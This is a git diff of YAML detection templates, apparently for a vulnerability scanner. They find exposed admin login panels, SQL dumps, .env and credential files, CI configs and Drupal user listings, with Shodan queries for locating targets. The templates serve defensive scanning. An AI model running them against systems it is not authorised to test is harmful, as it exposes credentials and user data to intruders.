index a8e354fba6..6e51ed3c09 100644
--- a/exposed-panels/wowza-streaming-engine.yaml
+++ b/exposed-panels/wowza-streaming-engine.yaml
@@ -4,8 +4,8 @@ info:
   name: Wowza Streaming Engine
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22
+  metadata:
+    shodan-query: http.title:"Manager" product:"Wowza Streaming Engine"
   tags: panel
 
 requests:
diff --git a/exposed-panels/wso2-management-console.yaml b/exposed-panels/wso2-management-console.yaml
index 27a169d84e..ef8789d180 100644
--- a/exposed-panels/wso2-management-console.yaml
+++ b/exposed-panels/wso2-management-console.yaml
@@ -8,7 +8,7 @@ info:
     - https://www.exploit-db.com/ghdb/5691
   metadata:
     shodan-query: http.favicon.hash:1398055326
-  tags: panel,wso2
+  tags: panel,wso2,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/xds-amr-status.yaml b/exposed-panels/xds-amr-status.yaml
index a7f548a112..a98ce44777 100644
--- a/exposed-panels/xds-amr-status.yaml
+++ b/exposed-panels/xds-amr-status.yaml
@@ -1,31 +1,31 @@
-id: xds-amr-status
+id: xds-amr-status
 
-info:
-  name: XDS-AMR - status
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-dork: 'http.title:"XDS-AMR - status"'
-  tags: panel,tech,xamr,xds
+info:
+  name: XDS-AMR - status
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-dork: 'http.title:"XDS-AMR - status"'
+  tags: panel,tech,xamr,xds
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/login.php"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '<title>XDS-AMR - Status</title>'
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        regex:
-          - 'XAMR\-([0-9]+)'
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>XDS-AMR - Status</title>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'XAMR\-([0-9]+)'
diff --git a/exposed-panels/xenforo-login.yaml b/exposed-panels/xenforo-login.yaml
index 47aec7814c..ee41e978a0 100644
--- a/exposed-panels/xenforo-login.yaml
+++ b/exposed-panels/xenforo-login.yaml
@@ -4,8 +4,8 @@ info:
   name: XenForo Login/Register
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22XenForo%22
+  metadata:
+    shodan-query: http.title:"XenForo"
   tags: panel
 
 requests:
diff --git a/exposed-panels/xenmobile-login.yaml b/exposed-panels/xenmobile-login.yaml
index ceafd5290b..34ebcf5672 100644
--- a/exposed-panels/xenmobile-login.yaml
+++ b/exposed-panels/xenmobile-login.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://www.exploit-db.com/ghdb/6675
-  tags: panel
+  tags: panel,edb
 
 requests:
   - method: GET
diff --git a/exposed-panels/xvr-login.yaml b/exposed-panels/xvr-login.yaml
index 13f9f39ce6..9e56fbf2d7 100644
--- a/exposed-panels/xvr-login.yaml
+++ b/exposed-panels/xvr-login.yaml
@@ -4,8 +4,8 @@ info:
   name: XVR LOGIN
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22
+  metadata:
+    shodan-query: http.title:"XVR LOGIN"
   tags: panel,xvr
 
 requests:
diff --git a/exposed-panels/xweb500-panel.yaml b/exposed-panels/xweb500-panel.yaml
index f15d2b7738..c85f8ee84c 100644
--- a/exposed-panels/xweb500-panel.yaml
+++ b/exposed-panels/xweb500-panel.yaml
@@ -5,7 +5,7 @@ info:
   author: princechaddha
   severity: info
   metadata:
-    google-dork: inurl:"xweb500.cgi"
+    google-query: inurl:"xweb500.cgi"
   tags: panel,xweb500
 
 requests:
diff --git a/exposed-panels/xxljob-panel.yaml b/exposed-panels/xxljob-panel.yaml
index 3fd00d6650..bcdb29d5b1 100644
--- a/exposed-panels/xxljob-panel.yaml
+++ b/exposed-panels/xxljob-panel.yaml
@@ -2,15 +2,20 @@ id: xxljob-panel
 
 info:
   name: XXLJOB Admin Login Panel
-  author: pdteam,daffainfo
+  author: pdteam,daffainfo,ritikchaddha
   severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:1691956220
   tags: panel,xxljob,login
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/xxl-job-admin/toLogin"
+      - "{{BaseURL}}/toLogin"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
diff --git a/exposed-panels/zabbix-server-login.yaml b/exposed-panels/zabbix-server-login.yaml
index aa225ec9d5..4e5c6d73a6 100644
--- a/exposed-panels/zabbix-server-login.yaml
+++ b/exposed-panels/zabbix-server-login.yaml
@@ -4,8 +4,8 @@ info:
   name: Zabbix Login
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22
+  metadata:
+    shodan-query: http.title:"zabbix-server"
   tags: panel,zabbix
 
 requests:
diff --git a/exposed-panels/zimbra-web-client.yaml b/exposed-panels/zimbra-web-client.yaml
index 7e7fa6cfc1..f4a13ef3a0 100644
--- a/exposed-panels/zimbra-web-client.yaml
+++ b/exposed-panels/zimbra-web-client.yaml
@@ -2,13 +2,16 @@ id: zimbra-web-client
 
 info:
   name: Zimbra Web Client - Sign In
-  author: dhiyaneshDk
+  author: dhiyaneshDk,idealphase
   severity: info
+  description: Zimbra provides open source server and client software for messaging and collaboration.
   reference:
     - https://www.exploit-db.com/ghdb/7409
+    - https://www.zimbra.com/
   metadata:
+    verified: true
     shodan-query: http.title:"Zimbra Web Client Sign In"
-  tags: panel,zimbra
+  tags: edb,panel,zimbra
 
 requests:
   - method: GET
@@ -25,3 +28,10 @@ requests:
       - type: status
         status:
           - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'AjxPackage\.setQueryString\("v=(.+)"\);'
diff --git a/exposed-panels/zimbra-web-login.yaml b/exposed-panels/zimbra-web-login.yaml
new file mode 100644
index 0000000000..dfaaa3b630
--- /dev/null
+++ b/exposed-panels/zimbra-web-login.yaml
@@ -0,0 +1,42 @@
+id: zimbra-web-login
+
+info:
+  name: Zimbra Collaboration Suite Web Client - Sign In
+  author: powerexploit
+  severity: info
+  description: |
+    Zimbra Collaboration Suite simplifies the communication environment, connects people over multiple channels, and provides a single place to manage collaboration and communication.
+  reference:
+    - https://www.zimbra.com/
+  metadata:
+    verified: true
+    shodan-query: http.title:"Zimbra Collaboration Suite"
+  tags: panel,zimbra
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Zimbra Collaboration Suite Log In"
+          - "Zimbra Web Client Sign In"
+          - "Zimbra Web Client Log In"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'v=([0-9]+)'
diff --git a/exposed-panels/zoho/manageengine-adaudit.yaml b/exposed-panels/zoho/manageengine-adaudit.yaml
index c62bc0fa97..bea3a78f07 100644
--- a/exposed-panels/zoho/manageengine-adaudit.yaml
+++ b/exposed-panels/zoho/manageengine-adaudit.yaml
@@ -2,10 +2,16 @@ id: manageengine-adaudit
 
 info:
   name: ZOHO ManageEngine ADAudit/ADManager Panel
-  author: dhiyaneshDK,PR3R00T
+  author: dhiyaneshDK,PR3R00T,idealphase
   severity: info
+  description: |
+    ADAudit Plus helps keep your Windows Server ecosystem secure and compliant by providing full visibility into all activities. An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!
   reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22
+    - https://www.manageengine.com/products/active-directory-audit/
+    - https://www.manageengine.com/products/ad-manager/
+  metadata:
+    verified: true
+    shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
   tags: panel,zoho,manageengine
 
 requests:
@@ -14,11 +20,14 @@ requests:
       - '{{BaseURL}}'
       - "{{BaseURL}}/authorization.do"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '<title>ManageEngine - ADManager Plus</title>'
+          - 'ManageEngine - ADManager Plus'
+          - 'ADAudit Plus'
+        condition: or
 
       - type: status
         status:
diff --git a/exposed-panels/zoho/manageengine-adselfservice.yaml b/exposed-panels/zoho/manageengine-adselfservice.yaml
index fb66eddfd7..da8f6f9103 100644
--- a/exposed-panels/zoho/manageengine-adselfservice.yaml
+++ b/exposed-panels/zoho/manageengine-adselfservice.yaml
@@ -4,8 +4,8 @@ info:
   name: ZOHO ManageEngine ADSelfService Plus
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22
+  metadata:
+    shodan-query: http.title:"ADSelfService Plus"
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zoho/manageengine-analytics.yaml b/exposed-panels/zoho/manageengine-analytics.yaml
index 761a398691..913172962a 100644
--- a/exposed-panels/zoho/manageengine-analytics.yaml
+++ b/exposed-panels/zoho/manageengine-analytics.yaml
@@ -4,8 +4,8 @@ info:
   name: ZOHO ManageEngine Analytics Plus
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D
+  metadata:
+    fofa-query: app="ZOHO-流量管理"
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zoho/manageengine-apex-helpdesk.yaml b/exposed-panels/zoho/manageengine-apex-helpdesk.yaml
index c279f19f1e..2322475cb0 100644
--- a/exposed-panels/zoho/manageengine-apex-helpdesk.yaml
+++ b/exposed-panels/zoho/manageengine-apex-helpdesk.yaml
@@ -4,8 +4,8 @@ info:
   name: ZOHO ManageEngine APEX IT Help-Desk
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22APEX+IT+Help+Desk%22
+  metadata:
+    shodan-query: http.title:"APEX IT Help Desk"
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zoho/manageengine-applications-manager.yaml b/exposed-panels/zoho/manageengine-applications-manager.yaml
index 48b1089249..b7a23b4350 100644
--- a/exposed-panels/zoho/manageengine-applications-manager.yaml
+++ b/exposed-panels/zoho/manageengine-applications-manager.yaml
@@ -4,8 +4,6 @@ info:
   name: ZOHO ManageEngine Applications Manager
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://fofa.so/result?qbase64=YXBwPSJaT0hPLU1hbmFnZUVuZ2luZS1BcHBsaWNhdGlvbnMtTWFuYWdlciI%3D
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zoho/manageengine-assetexplorer.yaml b/exposed-panels/zoho/manageengine-assetexplorer.yaml
index bb07eb097f..8733b452df 100644
--- a/exposed-panels/zoho/manageengine-assetexplorer.yaml
+++ b/exposed-panels/zoho/manageengine-assetexplorer.yaml
@@ -4,8 +4,8 @@ info:
   name: ZOHO ManageEngine AssetExplorer
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22
+  metadata:
+    shodan-query: http.title:"ManageEngine AssetExplorer"
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zoho/manageengine-desktop.yaml b/exposed-panels/zoho/manageengine-desktop.yaml
index 6c3e853340..3c4296b79a 100644
--- a/exposed-panels/zoho/manageengine-desktop.yaml
+++ b/exposed-panels/zoho/manageengine-desktop.yaml
@@ -4,8 +4,8 @@ info:
   name: ZOHO ManageEngine Desktop
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22
+  metadata:
+    shodan-query: http.title:"ManageEngine Desktop Central 10"
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zoho/manageengine-servicedesk.yaml b/exposed-panels/zoho/manageengine-servicedesk.yaml
index 50bcd2c22a..d782d75bfe 100644
--- a/exposed-panels/zoho/manageengine-servicedesk.yaml
+++ b/exposed-panels/zoho/manageengine-servicedesk.yaml
@@ -4,9 +4,8 @@ info:
   name: ZOHO ManageEngine ServiceDesk
   author: dhiyaneshDK,righettod
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
-    - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
+  metadata:
+    shodan-query: http.title:"ManageEngine ServiceDesk Plus"
   tags: panel,zoho,manageengine
 
 requests:
@@ -20,6 +19,7 @@ requests:
         words:
           - '<title>ManageEngine ServiceDesk Plus</title>'
           - '<title>ManageEngine ServiceDesk Plus - MSP</title>'
+        condition: or
 
       - type: status
         status:
diff --git a/exposed-panels/zoho/manageengine-supportcenter.yaml b/exposed-panels/zoho/manageengine-supportcenter.yaml
index 4be85998b0..26f24f275c 100644
--- a/exposed-panels/zoho/manageengine-supportcenter.yaml
+++ b/exposed-panels/zoho/manageengine-supportcenter.yaml
@@ -4,8 +4,8 @@ info:
   name: ZOHO ManageEngine SupportCenter
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+SupportCenter+Plus%22
+  metadata:
+    shodan-query: http.title:"ManageEngine SupportCenter Plus"
   tags: panel,zoho,manageengine
 
 requests:
diff --git a/exposed-panels/zte-panel.yaml b/exposed-panels/zte-panel.yaml
index efaad36a63..5e82c398ee 100644
--- a/exposed-panels/zte-panel.yaml
+++ b/exposed-panels/zte-panel.yaml
@@ -2,23 +2,38 @@ id: zte-panel
 
 info:
   name: ZTE Panel
-  author: github.com/its0x08
+  author: its0x08,idealphase
   severity: info
+  description: |
+    ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.
+  reference:
+    - https://www.zte.com.cn/global/
+  metadata:
+    verified: true
+    shodan-query: http.html:"ZTE Corporation"
   tags: panel,zte
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
+
     matchers:
       - type: word
+        part: body
         words:
           - "ZTE Corporation. All rights reserved. </div>"
           - '<form name="fLogin" id="fLogin" method="post"  onsubmit="return false;" action="">'
-        part: body
         condition: and
 
       - type: word
+        part: header
         words:
           - "Mini web server 1.0 ZTE corp 2005."
-        part: header
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<div class="type"><font id="">(.+)<\/font><\/div>'
diff --git a/exposed-panels/zyxel/zyxel-firewall-panel.yaml b/exposed-panels/zyxel/zyxel-firewall-panel.yaml
new file mode 100644
index 0000000000..c16ba53d99
--- /dev/null
+++ b/exposed-panels/zyxel/zyxel-firewall-panel.yaml
@@ -0,0 +1,37 @@
+id: zyxel-firewall-panel
+
+info:
+  name: Zyxel Firewall Panel
+  author: 0x240x23elu
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-440644339
+  tags: panel,xyxel,firewall
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/lib/mode_ana"
+
+      - type: word
+        part: body
+        words:
+          - "VPN"
+          - "USG"
+          - "ATP"
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "<title>(.*)</title>"
diff --git a/exposures/apis/drupal-jsonapi-user-listing.yaml b/exposures/apis/drupal-jsonapi-user-listing.yaml
new file mode 100644
index 0000000000..ee7980516b
--- /dev/null
+++ b/exposures/apis/drupal-jsonapi-user-listing.yaml
@@ -0,0 +1,33 @@
+id: drupal-jsonapi-user-listing
+
+info:
+  name: Drupal JSON:API User Listing
+  author: lixts
+  severity: medium
+  reference:
+    - https://www.drupal.org/project/drupal/issues/3240913
+  metadata:
+    verified: true
+  tags: drupal,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jsonapi/user/user"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '\{"display_name":"([A-Sa-z0-9-_]+)"\}'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '\{"display_name":"([A-Za-z0-9-_]+)"\}'
diff --git a/exposures/apis/strapi-page.yaml b/exposures/apis/strapi-page.yaml
index edf6a044e2..1570b71f93 100644
--- a/exposures/apis/strapi-page.yaml
+++ b/exposures/apis/strapi-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Strapi Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22
+  metadata:
+    shodan-query: http.title:"Welcome to your Strapi app"
   tags: api,strapi
 
 requests:
diff --git a/exposures/backups/exposed-mysql-initial.yaml b/exposures/backups/exposed-mysql-initial.yaml
index 3df4611d59..9507657cc1 100644
--- a/exposures/backups/exposed-mysql-initial.yaml
+++ b/exposures/backups/exposed-mysql-initial.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://hackerone.com/reports/1081817
-  tags: config,exposure
+  tags: config,exposure,hackerone
 
 requests:
   - method: GET
diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml
index 226bda68c0..418868119a 100644
--- a/exposures/backups/sql-dump.yaml
+++ b/exposures/backups/sql-dump.yaml
@@ -2,7 +2,7 @@ id: default-sql-dump
 
 info:
   name: MySQL Dump Files
-  author: geeknik,dwisiswant0
+  author: geeknik,dwisiswant0,ELSFA7110
   severity: medium
   tags: exposure,backup,mysql
 
@@ -28,6 +28,7 @@ requests:
       - "{{BaseURL}}/translate.sql"
       - "{{BaseURL}}/users.sql"
       - "{{BaseURL}}/wp-content/uploads/dump.sql"
+      - "{{BaseURL}}/wp-content/mysql.sql"
     headers:
       Range: "bytes=0-3000"
 
diff --git a/exposures/configs/appveyor-configuration-file.yaml b/exposures/configs/appveyor-configuration-file.yaml
new file mode 100644
index 0000000000..c14556da9f
--- /dev/null
+++ b/exposures/configs/appveyor-configuration-file.yaml
@@ -0,0 +1,29 @@
+id: appveyor-configuration-file
+
+info:
+  name: AppVeyor Configuration Exposure
+  author: DhiyaneshDk
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: html:"appveyor.yml"
+  tags: config,exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.appveyor.yml"
+      - "{{BaseURL}}/appveyor.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "install:"
+          - "test_script:"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/behat-config.yaml b/exposures/configs/behat-config.yaml
new file mode 100644
index 0000000000..09303ff8a8
--- /dev/null
+++ b/exposures/configs/behat-config.yaml
@@ -0,0 +1,32 @@
+id: behat-config
+
+info:
+  name: Behat Configuration File Exposure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"behat.yml"
+  reference: https://docs.behat.org/en/v2.5/guides/7.config.html
+  tags: exposure,behat,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/behat.yml"
+      - "{{BaseURL}}/behat.yml.dist"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'default:'
+          - 'paths:'
+          - 'suites:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/cisco-network-config.yaml b/exposures/configs/cisco-network-config.yaml
index 0de9a2b420..bbad3af125 100644
--- a/exposures/configs/cisco-network-config.yaml
+++ b/exposures/configs/cisco-network-config.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/5430
-  tags: config,exposure,cisco
+  tags: exposure,cisco,edb,config
 
 requests:
   - method: GET
diff --git a/exposures/configs/codeception-config.yaml b/exposures/configs/codeception-config.yaml
new file mode 100644
index 0000000000..6d3c31ff8d
--- /dev/null
+++ b/exposures/configs/codeception-config.yaml
@@ -0,0 +1,28 @@
+id: codeception-config
+
+info:
+  name: Codeception YAML Configuration File Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"codeception.yml"
+  tags: exposure,devops,codeception,config,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/codeception.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "paths:"
+          - "settings:"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/codeigniter-env.yaml b/exposures/configs/codeigniter-env.yaml
index 3d19875c13..2210e13695 100644
--- a/exposures/configs/codeigniter-env.yaml
+++ b/exposures/configs/codeigniter-env.yaml
@@ -1,9 +1,10 @@
 id: codeigniter-env
 
 info:
-  name: Codeigniter .env file
+  name: Codeigniter - .env File Discovery
   author: emenalf
   severity: high
+  description: Codeigniter .env file was discovered.
   tags: config,exposure,codeigniter
 
 requests:
@@ -33,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/config-rb.yaml b/exposures/configs/config-rb.yaml
new file mode 100644
index 0000000000..13374d3a06
--- /dev/null
+++ b/exposures/configs/config-rb.yaml
@@ -0,0 +1,30 @@
+id: config-rb
+
+info:
+  name: Config Ruby File Disclosure
+  author: DhiyaneshDK
+  severity: unknown
+  metadata:
+    verified: true
+    shodan-query: html:"config.rb"
+  tags: ruby,devops,exposure,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config.rb"
+      - "{{BaseURL}}/.chef/config.rb"
+      - "{{BaseURL}}/assets/config.rb"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'images_dir'
+          - 'css_dir'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/configuration-listing.yaml b/exposures/configs/configuration-listing.yaml
index f4039d46fa..4ba3d19f55 100644
--- a/exposures/configs/configuration-listing.yaml
+++ b/exposures/configs/configuration-listing.yaml
@@ -1,26 +1,26 @@
-id: configuration-listing
+id: configuration-listing
 
-info:
-  name: Sensitive Configuration Files Listing
-  author: j33n1k4
-  severity: medium
-  description: directory listing of sensitive files
-  reference: https://www.exploit-db.com/ghdb/7014
-  tags: config,listing,exposure
+info:
+  name: Sensitive Configuration Files Listing
+  author: j33n1k4
+  severity: medium
+  description: directory listing of sensitive files
+  reference: https://www.exploit-db.com/ghdb/7014
+  tags: config,listing,exposure
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/config/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of /configs"
-          - "Parent Directory"
-        condition: and
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of /configs"
+          - "Parent Directory"
+        condition: and
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/exposures/configs/coremail-config-disclosure.yaml b/exposures/configs/coremail-config-disclosure.yaml
index 2aaf8be503..3f85863b5f 100644
--- a/exposures/configs/coremail-config-disclosure.yaml
+++ b/exposures/configs/coremail-config-disclosure.yaml
@@ -1,9 +1,10 @@
 id: coremail-config-disclosure
 
 info:
-  name: Coremail Config Disclosure
+  name: Coremail - Config Discovery
   author: princechaddha
   severity: high
+  description: Coremail configuration information was discovered.
   reference:
     - https://www.secpulse.com/archives/107611.html
   tags: config,exposure
@@ -26,3 +27,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml
index afdf328951..058bbcca4d 100644
--- a/exposures/configs/dbeaver-credentials.yaml
+++ b/exposures/configs/dbeaver-credentials.yaml
@@ -1,9 +1,14 @@
 id: dbeaver-credentials
 
 info:
-  name: DBeaver Credential Exposure
+  name: DBeaver - Credentials Discovery
   author: geeknik
-  severity: high
+  severity: medium
+  description: DBeaver credentials were discovered.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+    cvss-score: 5.8
+    cwe-id: CWE-522
   tags: exposure,dbeaver
 
 requests:
@@ -33,3 +38,5 @@ requests:
         dsl:
           - "!contains(tolower(body), '<html')"
           - "!contains(tolower(body), '<body')"
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/detect-drone-config.yaml b/exposures/configs/detect-drone-config.yaml
index 4f5e31cf27..dbd5f71ce5 100644
--- a/exposures/configs/detect-drone-config.yaml
+++ b/exposures/configs/detect-drone-config.yaml
@@ -1,10 +1,12 @@
 id: detect-drone-config
 
 info:
-  name: Detect Drone Configuration
+  name: Drone - Configuration Detection
   author: geeknik
   severity: high
-  description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
+  description: Drone configuration was discovered.
+  reference:
+    - https://github.com/drone/drone
   tags: config,exposure,drone
 
 requests:
@@ -23,3 +25,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/django-variables-exposed.yaml b/exposures/configs/django-variables-exposed.yaml
new file mode 100644
index 0000000000..e69c00f579
--- /dev/null
+++ b/exposures/configs/django-variables-exposed.yaml
@@ -0,0 +1,47 @@
+id: django-variables-exposed
+
+info:
+  name: Exposed Django variables
+  author: nobody
+  severity: info
+  description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
+  reference:
+    - https://docs.djangoproject.com/en/1.11/ref/exceptions/
+    - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
+    - https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework-exceptions.yaml
+  metadata:
+    verified: true
+  tags: exposure,config,django
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'seeing this error because you have <code>DEBUG = True</code>'
+          - 'SuspiciousOperation'
+          - 'DisallowedHost'
+          - 'DisallowedModelAdminLookup'
+          - 'DisallowedModelAdminToField'
+          - 'DisallowedRedirect'
+          - 'InvalidSessionKey'
+          - 'RequestDataTooBig'
+          - 'SuspiciousFileOperation'
+          - 'SuspiciousMultipartForm'
+          - 'SuspiciousSession'
+          - 'TooManyFieldsSent'
+          - 'PermissionDenied'
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 400
diff --git a/exposures/configs/editor-exposure.yaml b/exposures/configs/editor-exposure.yaml
new file mode 100644
index 0000000000..c44c8ea249
--- /dev/null
+++ b/exposures/configs/editor-exposure.yaml
@@ -0,0 +1,35 @@
+id: editor-exposure
+
+info:
+  name: Editor Config Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"editorconfig"
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.editorconfig"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "= true"
+          - "= space"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/configs/esmtprc-config.yaml b/exposures/configs/esmtprc-config.yaml
index 7d09372d77..e85220d004 100644
--- a/exposures/configs/esmtprc-config.yaml
+++ b/exposures/configs/esmtprc-config.yaml
@@ -1,9 +1,10 @@
 id: esmtprc-config
 
 info:
-  name: eSMTP config disclosure
+  name: eSMTP - Config Discovery
   author: geeknik
   severity: high
+  description: eSMTP configuration was discovered.
   reference:
     - https://linux.die.net/man/5/esmtprc
   tags: esmtp,config
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/exposures/configs/exposed-authentication-asmx.yaml b/exposures/configs/exposed-authentication-asmx.yaml
index 419b353a14..5b26c6d126 100644
--- a/exposures/configs/exposed-authentication-asmx.yaml
+++ b/exposures/configs/exposed-authentication-asmx.yaml
@@ -6,7 +6,7 @@ info:
   severity: low
   reference:
     - https://www.exploit-db.com/ghdb/6604
-  tags: config,exposure
+  tags: config,exposure,edb
 
 requests:
   - method: GET
diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml
index 0930be1c94..0928d14375 100644
--- a/exposures/configs/exposed-gitignore.yaml
+++ b/exposures/configs/exposed-gitignore.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://twitter.com/pratiky9967/status/1230001391701086208
     - https://www.tenable.com/plugins/was/98595
-  tags: config,git,exposure
+  tags: exposure,tenable,config,git
 
 requests:
   - method: GET
diff --git a/exposures/configs/exposed-sharepoint-list.yaml b/exposures/configs/exposed-sharepoint-list.yaml
